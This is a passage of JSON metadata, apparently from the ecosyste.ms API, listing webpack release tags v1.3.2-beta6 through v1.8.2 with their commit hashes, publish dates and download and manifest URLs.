//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo